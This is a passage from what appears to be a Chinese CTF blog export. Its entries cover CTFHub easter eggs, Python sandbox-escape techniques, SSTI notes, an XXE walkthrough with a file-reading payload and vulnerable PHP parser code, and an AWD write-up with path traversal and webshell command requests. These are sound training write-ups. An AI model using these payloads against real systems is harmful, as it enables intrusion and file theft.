class="variable">$fp</span>, <span class="number">4096</span>)){</span><br><span class="line"> <span class="variable">$response</span> .= <span class="variable">$row</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="variable">$pos</span> = <span class="title function_ invoke__">strpos</span>(<span class="variable">$response</span>, <span class="string">"\r\n\r\n"</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$response</span>, <span class="variable">$pos</span>+<span class="number">4</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$response</span>;</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>提权</tag>
</tags>
</entry>
<entry>
<title>ctfhub-彩蛋</title>
<url>/2023/07/CTFHub%E5%BD%A9%E8%9B%8B/</url>
<content><![CDATA[<h2 id="工具-彩蛋"><a href="#工具-彩蛋" class="headerlink" title="工具 彩蛋"></a>工具 彩蛋</h2><p>一开始的想法是工具一共有 8 页,想抓个包改下看看有没有第九页<br>抓包后发现不管哪一页 limit 都是 12 但 offset 在变化<br>于是<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254043338-28.png" alt="在这里插入图片描述">这样设置参数<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254045357-31.png" alt="在这里插入图片描述">在长度为 1000 到 6、7 千左右随便一个双击后 <code>点击响应</code> 看<code>响应</code>包<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254048636-34.png" alt="在这里插入图片描述">在最后一行</p>
<h2 id="首页-彩蛋"><a href="#首页-彩蛋" class="headerlink" title="首页 彩蛋"></a>首页 彩蛋</h2><p><a href="https://api.ctfhub.com/">api</a>中间框内隐藏着两行字<br>ctfhub{c18732f48a96c40d40a06e74b1305706}<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254050970-37.png" alt="在这里插入图片描述"></p>
<h2 id="题目入口-彩蛋"><a href="#题目入口-彩蛋" class="headerlink" title="题目入口 彩蛋"></a>题目入口 彩蛋</h2><p>在 web-ssrf 中间那一列的某些题传参错误时会出现<br>详情见<a href="https://blog.csdn.net/qq_62414126/article/details/122881838">ctfhub-ssrf</a>post 最后一行介绍</p>
<h2 id="公众号"><a href="#公众号" class="headerlink" title="公众号"></a>公众号</h2><p>公众号彩蛋坑的一批!<br>首先要先绑定<br>然后点彩蛋<br>它提示要回复正确的关键词<br>我*#@%<br>我回复过</p>
<blockquote>
<p>彩蛋 关键词 egg ctfhub CTFHub 拿来把你 CTFer 自己人 ……</p>
</blockquote>
<p>到底没想到竟然是 flag</p>
<h2 id="投稿提交-彩蛋"><a href="#投稿提交-彩蛋" class="headerlink" title="投稿提交 彩蛋"></a>投稿提交 彩蛋</h2><p>只找到了前半部分<br>分别在题目提交和 wp 提交页面的最后</p>
<figure class="highlight css"><table><tr><td class="code"><pre><span class="line">ctfhub{<span class="number">029</span>e02eb3a1</span><br><span class="line"> e8c49b1132b5</span><br><span class="line"> <span class="number">15</span>b652a5f3a8</span><br><span class="line"> <span class="number">62013</span>}</span><br></pre></td></tr></table></figure>
<p>最后这个彩蛋剩余部分也没找到<br>网上搜了下才明白:感谢 anweilx 的<a href="https://www.cnblogs.com/anweilx/p/12493000.html">wp</a><br>第一行是俩页面的最后有<br>第二行是在俩页面源码 分别搜<code>奖励</code> 在上面那行一个是 base64 然后再转 url 一个是 hex 解码<br>第三行是俩页面的图片隐写 丢进 winhex<br>第四行有提示<br>aes 256 ecb<a href="http://tool.chacuo.net/cryptaes/">解码</a></p>
<h2 id="其他彩蛋"><a href="#其他彩蛋" class="headerlink" title="其他彩蛋"></a>其他彩蛋</h2><p>剩余皆可在对应页面搜索 egg 即可获得</p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>ctfhub</tag>
</tags>
</entry>
<entry>
<title>PyJail python沙箱逃逸探究</title>
<url>/2023/07/PyJail%20python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%8E%A2%E7%A9%B6/</url>
<content><![CDATA[<h2 id="python-特性"><a href="#python-特性" class="headerlink" title="python 特性"></a>python 特性</h2><p>在 python 中,类均继承自<code>object</code>基类;</p>
<h3 id="python-魔术方法"><a href="#python-魔术方法" class="headerlink" title="python 魔术方法"></a>python 魔术方法</h3><ul>
<li><code>__init__</code>:构造函数。这个在实例化类的时候就会用到,一般是接受类初始化的参数,并且进行一系列初始化操作。</li>
<li><code>__len__</code>:返回对象的长度。</li>
<li><code>__str__</code>:返回对象的字符串表示。对一个对象<code>a</code>使用<code>str(a)</code>时,会尝试调用<code>a.__str__()</code>。相似地,还有<code>__int__</code>魔术方法也用于类型转换,不过较少使用。</li>
<li><code>__getitem__</code>:根据索引返回对象的某个元素。对一个对象<code>a</code>使用<code>a[1]</code>时,会尝试调用<code>a.__getitem__(1)</code>。</li>
<li><code>__add__</code>、<code>__sub__</code>、<code>__mul__</code>、<code>__div__</code>、<code>__mod__</code>:算术运算,加减乘除模。如对一个对象<code>a</code>使用<code>a+b</code>时,会尝试调用<code>a.__add__(b)</code>。相应地,对于有些运算,对象需放在后面(第二个操作数)的,则需实现<code>__radd__</code>、<code>__rsub__</code>、<code>__rmul__</code>、<code>__rdiv__</code>、<code>__rmod__</code>,如椭圆曲线上的点的倍点运算<code>G -> d * G</code>,就可以通过实现<code>__rmul__</code>来实现。</li>
<li><code>__and__</code>,<code>__or__</code>、<code>__xor__</code>:逻辑运算,和算术运算类似;</li>
<li><code>__eq__</code>,<code>__ne__</code>、<code>__lt__</code>、<code>__gt__</code>、<code>__le__</code>、<code>__ge__</code>:比较运算,和算术运算类似;例如<code>'贵州' > '广西'</code>,就会转而调用<code>'贵州'.__gt__('广西')</code>;</li>
<li><code>__getattr__</code>:对象是否含有某属性。如果我们对对象<code>a</code>所对应的类实现了该方法,那么在调用未实现的<code>a.b</code>时,就会转而调用<code>a.__getattr__(b)</code>。这也等价于用函数的方法调用:<code>getattr(a, 'b')</code>。有<code>__getattr__</code>,自然也有对应的<code>__setattr__</code>;</li>
<li><code>__subclasses__</code>:返回当前类的所有子类。一般是用在<code>object</code>类中,在<code>object.__subclasses__()</code>中,我们可以找到<code>os</code>模块中的类,然后再找到<code>os</code>,并且执行<code>os.system</code>,实现 RCE。</li>
</ul>
<h3 id="python-魔术属性"><a href="#python-魔术属性" class="headerlink" title="python 魔术属性"></a>python 魔术属性</h3><ul>
<li><p><code>__dict__</code>:可以查看内部所有属性名和属性值组成的字典。</p>
</li>
<li><p><code>__doc__</code>:类的帮助文档。默认类均有帮助文档。对于自定义的类,需要我们自己实现。</p>
</li>
<li><p><code>__class__</code>:返回当前对象所属的类。如<code>''.__class__</code>会返回<code><class 'str'></code>。拿到类之后,就可以通过构造函数生成新的对象,如<code>''.__class__(4396)</code>,就等价于<code>str(4396)</code>,即<code>'4396'</code>;</p>
</li>
<li><p><code>__base__</code>:返回当前类的基类。如<code>str.__base__</code>会返回<code><class 'object'></code>;</p>
</li>
</ul>
<h3 id="其他内置函数和变量"><a href="#其他内置函数和变量" class="headerlink" title="其他内置函数和变量"></a>其他内置函数和变量</h3><ul>
<li><code>dir</code>:查看对象的所有属性和方法。在我们没有思路的时候,可以通过该函数查看所有可以利用的方法;此外,在题目禁用引号以及小数点时,也可以先用拿到类所有可用方法,再索引到方法名,并且通过<code>getattr</code>来拿到目标方法。</li>
<li><code>chr</code>、<code>ord</code>:字符与 ASCII 码转换函数,能帮我们绕过一些 WAF</li>
<li><code>globals</code>:返回所有全局变量的函数;</li>
<li><code>locals</code>:返回所有局部变量的函数;</li>
<li><code>__import__</code>:载入模块的函数。例如<code>import os</code>等价于<code>os = __import__('os')</code>;</li>
<li><code>__name__</code>:该变量指示当前运行环境位于哪个模块中。如我们 python 一般写的<code>if __name__ == '__main__':</code>,就是来判断是否是直接运行该脚本。如果是从另外的地方 import 的该脚本的话,那<code>__name__</code>就不为<code>__main__</code>,就不会执行之后的代码。更多参考<a href="https://link.zhihu.com/?target=https://www.geeksforgeeks.org/__name__-a-special-variable-in-python/">这里</a>;</li>
<li><code>__builtins__</code>:包含当前运行环境中默认的所有函数与类。如上面所介绍的所有默认函数,如<code>str</code>、<code>chr</code>、<code>ord</code>、<code>dict</code>、<code>dir</code>等。在 pyjail 的沙箱中,往往<code>__builtins__</code>被置为<code>None</code>,因此我们不能利用上述的函数。所以一种思路就是我们可以先通过类的基类和子类拿到<code>__builtins__</code>,再<code>__import__('os').system('sh')</code>进行 RCE;</li>
<li><code>__file__</code>:该变量指示当前运行代码所在路径。如<code>open(__file__).read()</code>就是读取当前运行的 python 文件代码。需要注意的是,<strong>该变量仅在运行代码文件时会产生,在运行交互式终端时不会有此变量</strong>;</li>
<li><code>_</code>:该变量返回上一次运行的 python 语句结果。需要注意的是,<strong>该变量仅在运行交互式终端时会产生,在运行代码文件时不会有此变量</strong>。</li>
</ul>
<h2 id="WAF"><a href="#WAF" class="headerlink" title="WAF"></a>WAF</h2><h3 id="过滤"><a href="#过滤" class="headerlink" title="过滤[]"></a>过滤<code>[]</code></h3><p>使用<code>pop</code>、<code>__getitem__</code> 代替</p>
<p>例如:<code>a.__getitem__(0)</code>、<code>{"a": 1}.pop("a")</code></p>
<p>或使用 next 等指针指向(类似无参 RCE 特殊函数遍历)</p>
<p>需要去别的是 python 需要使用迭代器<code>iter(object[, sentinel])</code>作为传入函数</p>
<h3 id="过滤字符"><a href="#过滤字符" class="headerlink" title="过滤字符"></a>过滤字符</h3><h6 id="chr-函数构造字符"><a href="#chr-函数构造字符" class="headerlink" title="chr() 函数构造字符"></a><code>chr()</code> 函数构造字符</h6><h4 id="利用输出"><a href="#利用输出" class="headerlink" title="利用输出"></a>利用输出</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="built_in">str</span>(().__class__.__new__)[i]+……</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">>>><span class="built_in">print</span>(<span class="built_in">str</span>(().__class__.__new__))</span><br><span class="line"><built-<span class="keyword">in</span> method __new__ of <span class="built_in">type</span> <span class="built_in">object</span> at <span class="number">0x00007FFF01FE8AB0</span>></span><br></pre></td></tr></table></figure>
<h3 id="过滤数字"><a href="#过滤数字" class="headerlink" title="过滤数字"></a>过滤数字</h3><ul>
<li>0:<code>int(bool([]))</code>、<code>Flase</code>、<code>len([])</code>、<code>any(())</code></li>
<li>1:<code>int(bool([""]))</code>、<code>True</code>、<code>all(())</code>、<code>int(list(list(dict(a၁=())).pop()).pop())</code></li>
<li>len:len(str({}.keys))</li>
<li>1.0:<code>float(True)</code></li>
<li>-1:<code>~0</code></li>
</ul>
<h3 id="过滤特殊字符"><a href="#过滤特殊字符" class="headerlink" title="过滤特殊字符"></a>过滤特殊字符</h3><p>str 被过滤<code>type('')()</code>、<code>format()</code> 即可。同理,<code>int</code>、<code>list</code> 都可以用 <code>type</code> 构造出来。</p>
<h3 id="Non-ASCII-Identifiers"><a href="#Non-ASCII-Identifiers" class="headerlink" title="Non-ASCII Identifiers"></a>Non-ASCII Identifiers</h3><p>在 python3 中支持 Non-ASCII Identifies 并且所有都会被转换成 unicode 的 NFKC(也就是标准模式)。我们可以用斜体或者花体各种各样的与标准字母相像的来进行导包操作。</p>
<blockquote>
<h4 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h4><p><a href="https://zhuanlan.zhihu.com/p/578966149">PyJail python 沙箱逃逸探究·总览</a></p>
<p><a href="http://twe1v3.top/2023/02/pyjail-%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93%E3%80%90CV%E3%80%91/#more">pyjail-学习总结【CV】 | TWe1v3</a></p>
</blockquote>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>python</tag>
<tag>沙箱逃逸</tag>
<tag>PyJail</tag>
</tags>
</entry>
<entry>
<title>SSTI模板注入</title>
<url>/2023/07/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</url>
<content><![CDATA[<p><img src= "/img/12ec799b41b544eb83db7a111956c0cb.png" alt="在这里插入图片描述"></p>
<h2 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h2><p>ssti 注入点在 msg<br>注入49出现 orz 应该是有过滤</p>
1正常
<p>hint 里缺 cookie_secret<br>该项在 handler.settings</p>
<blockquote>
<p>Handler 这个对象,Handler 指向的处理当前这个页面的 RequestHandler 对象<br>RequestHandler 中并没有 settings 这个属性,与 RequestHandler 关联的 Application 对象(Requestion.application)才有 setting 这个属性<br>handler 指向 RequestHandler<br>而 RequestHandler.settings 又指向 self.application.settings<br>所有 handler.settings 就指向 RequestHandler.application.settings 了!</p>
</blockquote>
<p><img src= "/img/ac2991bc7e1e4e64b87451461cb17916.png" alt="在这里插入图片描述">然后按 hint 里的 MD5 加密过后传参<br><img src= "/img/3ee21ded82d8493baba4f8b5b940927a.png" alt="在这里插入图片描述"></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">?filename=/fllllllllllllag&filehash=ff92d5623223cadc00efabfc7676f9fe</span><br></pre></td></tr></table></figure>
<p>filehash 不同 请自行加密<br><img src= "/img/c860336ae81a4d6e8c52328bf1ae378c.png" alt="在这里插入图片描述"></p>
<h2 id="BJDCTF2020-The-mystery-of-ip"><a href="#BJDCTF2020-The-mystery-of-ip" class="headerlink" title="[BJDCTF2020]The mystery of ip"></a>[BJDCTF2020]The mystery of ip</h2><p><img src= "/img/ec82c70c7fdf49b698f9095bda0d1662.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">'header.php'</span>);</span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">'./libs/Smarty.class.php'</span>);</span><br><span class="line"> <span class="variable">$smarty</span> = <span class="keyword">new</span> <span class="title class_">Smarty</span>();</span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'HTTP_CLIENT_IP'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_CLIENT_IP'</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">elseif</span> (!<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_X_FORWARDED_FOR'</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$ip</span>=<span class="variable">$_SERVER</span>[<span class="string">'REMOTE_ADDR'</span>];</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//$your_ip = $smarty->display("string:".$ip);</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<div class=\"container panel1\"></span></span><br><span class="line"><span class="string"> <div class=\"row\"></span></span><br><span class="line"><span class="string"> <div class=\"col-md-4\"></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> <div class=\"col-md-4\"></span></span><br><span class="line"><span class="string"> <div class=\"jumbotron pan\"></span></span><br><span class="line"><span class="string"> <div class=\"form-group log\"></span></span><br><span class="line"><span class="string"> <label><h2>Your IP is : "</span>;</span><br><span class="line"> <span class="variable">$smarty</span>-><span class="title function_ invoke__">display</span>(<span class="string">"string:"</span>.<span class="variable">$ip</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">" </h2></label></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> <div class=\"col-md-4\"></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"> </div>"</span>;</span><br><span class="line"> <span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p><img src= "/img/eb0e52d7b7f74ac1bb74f7c38b4ca72f.png" alt="在这里插入图片描述"></p>
<h2 id="BJDCTF2020-Cookie-is-so-stable"><a href="#BJDCTF2020-Cookie-is-so-stable" class="headerlink" title="[BJDCTF2020]Cookie is so stable"></a>[BJDCTF2020]Cookie is so stable</h2><p><img src= "/img/f568432cbffb4e5f9603858a0cfa797d.png" alt="在这里插入图片描述"></p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>SSTI</tag>
<tag>模板注入</tag>
</tags>
</entry>
<entry>
<title>xxe</title>
<url>/2023/07/XXE/</url>
<content><![CDATA[<h3 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h3><p>发现输入的 username 被 alert 了<br>查源码</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">onclick = <span class="string">"XMLFunction()"</span>;</span><br></pre></td></tr></table></figure>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254264857-190.png" alt="在这里插入图片描述">抓包看 xml 格式<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254267429-193.png" alt="在这里插入图片描述">回来看控制台<br>发现 js 的 xml 应用</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><script type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="keyword">function</span> <span class="title function_">XMLFunction</span>(<span class="params"></span>){</span><br><span class="line"> <span class="keyword">var</span> xml = <span class="string">''</span> +</span><br><span class="line"> <span class="string">'<?xml version="1.0" encoding="UTF-8"?>'</span> +</span><br><span class="line"> <span class="string">'<root>'</span> +</span><br><span class="line"> <span class="string">' <username>'</span> + $(<span class="string">'#username'</span>).<span class="title function_">val</span>() + <span class="string">'</username>'</span> +</span><br><span class="line"> <span class="string">' <password>'</span> + $(<span class="string">'#password'</span>).<span class="title function_">val</span>() + <span class="string">'</password>'</span> +</span><br><span class="line"> <span class="string">' </root>'</span>;</span><br><span class="line"> <span class="keyword">var</span> xmlhttp = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span><br><span class="line"> xmlhttp.<span class="property">onreadystatechange</span> = <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> <span class="keyword">if</span>(xmlhttp.<span class="property">readyState</span> == <span class="number">4</span>){</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(xmlhttp.<span class="property">readyState</span>);</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(xmlhttp.<span class="property">responseText</span>);</span><br><span class="line"> <span class="title function_">alert</span>(xmlhttp.<span class="property">responseText</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> xmlhttp.<span class="title function_">open</span>(<span class="string">"POST"</span>,<span class="string">"login.php"</span>,<span class="literal">true</span>);</span><br><span class="line"> xmlhttp.<span class="title function_">send</span>(xml);</span><br><span class="line"> };</span><br><span class="line"> </script></span><br></pre></td></tr></table></figure>
<p>构造 xxe 攻击<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254269819-196.png" alt="在这里插入图片描述">这是 post 包<code>传的时候记得把注释删去</code></p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"UTF-8"</span>?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">root</span>[</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY <span class="keyword">flag</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///flag"</span>></span><!--构造实体--></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">root</span>></span></span><br><span class="line"><span class="tag"><<span class="name">username</span>></span><span class="symbol">&flag;</span><span class="tag"></<span class="name">username</span>></span><span class="comment"><!--输出flag实体--></span></span><br><span class="line"><span class="tag"><<span class="name">password</span>></span>2333<span class="tag"></<span class="name">password</span>></span></span><br><span class="line"><span class="tag"></<span class="name">root</span>></span></span><br></pre></td></tr></table></figure>
<p>flag{6866a844-3788-4a9d-9909-1d9d9943f56f}</p>
<p><img src= "/img/cd6a7f863a0647bb892ae50de7f3e0f9.png" alt="在这里插入图片描述"><br><img src= "/img/13c964cfa670469aa893c588d287e821.png" alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">* autor: c0ny1</span></span><br><span class="line"><span class="comment">* date: 2018-2-7</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$USERNAME</span> = <span class="string">'admin'</span>; <span class="comment">//账号</span></span><br><span class="line"><span class="variable">$PASSWORD</span> = <span class="string">'024b87931a03f738fff6693ce0a78c88'</span>; <span class="comment">//密码</span></span><br><span class="line"><span class="variable">$result</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">libxml_disable_entity_loader</span>(<span class="literal">false</span>);</span><br><span class="line"><span class="variable">$xmlfile</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">'php://input'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>{</span><br><span class="line"> <span class="variable">$dom</span> = <span class="keyword">new</span> <span class="title class_">DOMDocument</span>();</span><br><span class="line"> <span class="variable">$dom</span>-><span class="title function_ invoke__">loadXML</span>(<span class="variable">$xmlfile</span>, LIBXML_NOENT | LIBXML_DTDLOAD);</span><br><span class="line"> <span class="variable">$creds</span> = <span class="title function_ invoke__">simplexml_import_dom</span>(<span class="variable">$dom</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$username</span> = <span class="variable">$creds</span>->username;</span><br><span class="line"> <span class="variable">$password</span> = <span class="variable">$creds</span>->password;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$username</span> == <span class="variable">$USERNAME</span> && <span class="variable">$password</span> == <span class="variable">$PASSWORD</span>){</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">"<result><code>%d</code><msg>%s</msg></result>"</span>,<span class="number">1</span>,<span class="variable">$username</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">"<result><code>%d</code><msg>%s</msg></result>"</span>,<span class="number">0</span>,<span class="variable">$username</span>);</span><br><span class="line"> }</span><br><span class="line">}<span class="keyword">catch</span>(<span class="built_in">Exception</span> <span class="variable">$e</span>){</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">sprintf</span>(<span class="string">"<result><code>%d</code><msg>%s</msg></result>"</span>,<span class="number">3</span>,<span class="variable">$e</span>-><span class="title function_ invoke__">getMessage</span>());</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">'Content-Type: text/html; charset=utf-8'</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$result</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>有 admin 密码了也没用<br>藏内网了,上次比赛 ssrf 题出过</p>
<ul>
<li>etc/hosts</li>
<li>proc/net/arp<br><img src= "/img/a3a597abcb6b4158bcce5dcbb89afe09.png" alt="在这里插入图片描述"></li>
</ul>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>xxe</tag>
<tag>buuctf</tag>
</tags>
</entry>
<entry>
<title>Visual Studio 2022界面美化教程</title>
<url>/2023/07/Visual%20Studio%202022%E7%95%8C%E9%9D%A2%E7%BE%8E%E5%8C%96%E6%95%99%E7%A8%8B/</url>
<content><![CDATA[<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254207258-133.png" alt="点击并拖拽以移动"></p>
<p> 我之前用的是2019版本,后来有出新版我也没管,直到前几天他给我推送2022版了,查了下大部分都是好评(bug恐惧症和恋旧),于是我决定入2022版了,但又怕我在2019调好的设置用不到2022上,于是暂时让两个版本共存,等2022调试好了再说2019的事。</p>
<p>这是我在2019上美化用到的插件和设置(因为网上类似的不少,但2022版貌似没有人发过,所以我决定写这篇文章)</p>
<p>不出所料,2022版好多东西更新,导致一些东西不能用了,导入2019版甚至文件的时候,有一部分报错了,要不然就是改名了,要不然就是更新换代了,没大有影响,以萌新目前来看,是往好的方向发展了。</p>
<p>但是我的那些美化插件直接搜名字的话是找不到了,于是我就在那找替代品,就找到了这两个插件。</p>
<p>第一个插件,是2019版变的,变了样之后差点给我整不会了,它是类似于编程。</p>
<p>新建项目 C#里面最后一项</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254210315-136.png" alt="点击并拖拽以移动"></p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254212027-139.png" alt="da3a0ac9713d4b289c4351ca0ac8835d.png"></p>
<p> 创建之后,把2019版的该插件里的美化设置导出,然后重命名为CustomTheme.vstheme</p>
<p>然后复制到你新创建的2022版那个项目里,选择替换更新,之后项目文件夹里.sln后缀的那个文件打开,选择你之前那个配置的名字,然后运行,不管他蹦出来啥弹窗,等他一打开接着关了就好,之后重启visualstudio就可以了</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254213778-142.png" alt="点击并拖拽以移动"></p>
<p>这个插件是为后面设置背景图片准备</p>
<p>第二个插件我原来用的是moeIDE,但是2022版它不支持了,所以就用新插件代替了。</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254216001-145.png" alt="点击并拖拽以移动"></p>
<p>背景图是B站1024节发布的一张壁纸,我用ps调了下对比度,让他更鲜艳一些</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254218564-148.png" alt="点击并拖拽以移动"></p>
]]></content>
<categories>
<category>资源</category>
</categories>
<tags>
<tag>visual studio 2022</tag>
</tags>
</entry>
<entry>
<title>2024 长城杯铁人三项半决赛第二赛区 wp</title>
<url>/2024/05/awdwp/</url>
<content><![CDATA[<h2 id="CFS"><a href="#CFS" class="headerlink" title="CFS"></a>CFS</h2><h4 id="misc1"><a href="#misc1" class="headerlink" title="misc1"></a>misc1</h4><p>备份文件泄露</p>
<p>下载后是流量包</p>
<p>流量包存在明文 flag</p>
<p>(这里可能是非预期,预期是 aes 破解到 test 密码后,有个页面有个 flag)</p>
<p><img src= "/./img/image-20240421174259759.png" alt="image-20240421174259759"></p>
<h4 id="misc2"><a href="#misc2" class="headerlink" title="misc2"></a>misc2</h4><p>流量里还有一个 flag.zip</p>
<p>导出后</p>
<p>爆破得密码为 123456</p>
<h4 id="web"><a href="#web" class="headerlink" title="web"></a>web</h4><p>存在 rce 查看解析目录后 echo 一句话木马进去</p>
<p>连接后 cat /flag 啥啥啥.txt</p>
<p>flag get</p>
<p><img src= "/./img/image-20240421175236.png" alt="屏幕截图 2024-04-21 175236"></p>
<h2 id="AWD"><a href="#AWD" class="headerlink" title="AWD"></a>AWD</h2><p>题目附件备份:</p>
<p><a href="/files/php.7z">php</a></p>
<p><a href="/files/jsp.7z">java1</a></p>
<p><a href="/files/java.7z">java2</a></p>
<h4 id="php"><a href="#php" class="headerlink" title="php"></a>php</h4><p>hook 流量发现一个 php 路径穿越</p>
<p><code>/frontend/ajax/getfile?file=../../../../../../flag.txt</code></p>
<p>修复:</p>
<p>将/和.等用于路径穿越的字符过滤置空</p>
<p><img src= "/./img/image-20240421182144415.png" alt="image-20240421182144415"></p>
<h4 id="java1"><a href="#java1" class="headerlink" title="java1"></a>java1</h4><p>一个 java</p>
<p><code>/forget.jsp?cmd1=cat+/flag.txt</code></p>
<p>修复 把 cmd1 字段改成复杂密码 使攻击者无法连接</p>
<p><img src= "/./img/image-20240421182841159.png" alt="image-20240421182841159"></p>
]]></content>
<categories>
<category>awd</category>
</categories>
<tags>
<tag>awd</tag>
<tag>长城杯</tag>
<tag>铁人三项</tag>
</tags>
</entry>
<entry>
<title>ctfhub-rce</title>
<url>/2023/07/ctfhub-rce/</url>
